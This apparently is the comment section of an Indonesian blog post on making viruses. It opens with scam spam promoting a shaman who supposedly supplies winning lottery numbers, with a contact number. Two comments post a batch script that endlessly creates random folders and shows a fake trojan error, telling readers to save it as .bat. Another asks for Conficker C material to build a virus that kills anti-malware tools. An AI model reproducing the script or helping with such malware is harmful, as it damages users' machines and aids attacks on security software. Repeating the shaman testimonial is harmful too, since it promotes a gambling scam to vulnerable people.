saya mengucapkan banyak terimakasih kepada MBAH KABOIRENG yang telah menolong saya dalam kesulitan,ini tidak pernah terfikirkan dari benak saya kalau nomor yang saya pasang bisa tembus dan ALHAMDULILLAH kini saya sekeluarga sudah bisa melunasi semua hutang2 kami,sebenarnya saya bukan penggemar togel tapi apa boleh buat kondisi yang tidak memunkinkan dan akhirnya saya minta tolong sama MBAH KABOIRENG dan dengan senang hati MBAH KABOIRENG mau membantu saya..,ALHAMDULIL LAH nomor yang dikasi MBAH KABOIRENG semuanya bener2 terbukti tembus dan baru kali ini saya menemukan dukun yang jujur,jangan anda takut untuk menhubungiya jika anda ingin mendapatkan nomor yang betul2 tembus seperti saya,silahkan hubungi MBAH KABOIRENG DI 082=322=212=111 ingat kesempat tidak akan datang untuk yang kedua kalinga dan perlu anda ketahui kalau banyak dukun yang tercantum dalam internet,itu jangan dipercaya kalau bukan nama MBAH KABOIRENG KLIK TOGEL JITU DISINI

Anonim mengatakan...

Nambahin doang, coppas ini ke notepad

@echo off
:top
md %random%
goto top

@echo off
msg * ERROR : TROJ 10101001111101010101010110010101101001010101010

HAHAHA mengatakan...

Nambahin doang, coppas ini ke notepad

@echo off
:top
md %random%
goto top

@echo off
msg * ERROR : TROJ 10101001111101010101010110010101101001010101010

save as : .bat

Chandira IDN PRO RSA mengatakan...

mohon gan kasih tau Data Conficker Paket C
udh buat virus Recylernya tinggal Conficker C nya doang
kasih tau datanya dong Pleasee
virusnya ampuh buat Nge Kill Anti Malware! loh
jadi tinggal nyari Data Confickernya doang

Anonim mengatakan...

bagus bnget gan bloggernya , bagi ilmu lgi dong untuk buat virus yg lain :D

Poskan Komentar

Terima Kasih Telah Berkunjung di Blog Saya
Setelah Anda Baca Artikel nya Yang di Atas
Jangan Lupa Untuk Meninggalkan Komentar nya
Berkomentarlah Dengan Baik dan Sopan..
Terima Kasih^_^ Salam Blogger!

Follow by Email

Followers

Site Info